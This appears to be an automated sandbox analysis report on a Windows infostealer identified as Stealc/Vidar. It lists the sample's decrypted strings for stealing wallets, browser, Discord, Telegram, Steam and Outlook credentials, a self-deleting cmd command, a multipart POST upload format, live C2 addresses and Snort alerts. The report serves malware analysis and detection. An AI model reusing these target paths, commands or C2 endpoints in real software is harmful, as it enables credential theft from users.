Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: wallets
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ProductName
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DisplayName
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Network Info:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: System Summary:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - HWID:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - OS:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Architecture:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - UserName:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Local Time:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - UTC:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Language:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Laptop:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Running Path:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - CPU:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Threads:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Cores:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - RAM:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: - GPU:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: User Agents:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: All Users:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Current User:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Process List:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: system_info.txt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: nss3.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Temp\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: .exe
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: runas
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: open
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: /c start
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: %RECENT%
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: *.lnk
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: files
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \discord\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: key_datas
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: map*
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Telegram
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: *.tox
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: *.ini
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Password
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: 00000001
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: 00000002
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: 00000003
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: 00000004
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Pidgin
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \.purple\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: accounts.xml
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: token:
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: SteamPath
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \config\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ssfn*
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: config.vdf
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Steam\
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: browsers
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: done
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: soft
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: https
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: POST
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: hwid
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: build
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: token
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: file_name
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: file
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: message
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B086C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6B086C80
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C71A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6C71A9A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C714440 PK11_PrivDecrypt,	1_2_6C714440
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6C6E4420
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7144C0 PK11_PubEncrypt,	1_2_6C7144C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000E4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	5_2_000E4280
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000E45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	5_2_000E45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 5.2.run.exe.3c1a15b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.57b4e64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.3ea215b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.run.exe.3bd686d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.56bbe64.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.3e5e86d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5770976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.3ea2d5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.56bb264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.5677976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.run.exe.3c1ad5b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.57b4264.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 5324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Unpacked PE file: 0.2.TNQTc6Qmkg.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Unpacked PE file: 1.2.u3bs.0.exe.400000.0.unpack

Source: TNQTc6Qmkg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.4:49761 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000005.00000002.2297845560.000000006C867000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2732283280.000000006AF27000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr
Source:	Binary string: PC:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: nss3.pdb@ source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
Source:	Binary string: C:\nezudavoxuyel-61\padij\piw.pdb source: TNQTc6Qmkg.exe
Source:	Binary string: C:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
Source:	Binary string: mozglue.pdb source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: HDBKJEGIEB.exe, 0000001A.00000002.2969121960.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, HDBKJEGIEB.exe, 0000001A.00000000.2862082755.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, tiktok[1].exe.1.dr
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: UIxMarketPlugin.dll.5.dr

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File opened: C:\Users\user\AppData\Local\Temp\u3bs.2	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.76/3cd2b41cbde8fc9c.php
Source: Malware configuration extractor	URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Apr 2024 00:19:00 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 27 Apr 2024 00:15:01 GMTETag: "47e00-61708e94e86ef"Accept-Ranges: bytesContent-Length: 294400Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 75 f1 78 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3a c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 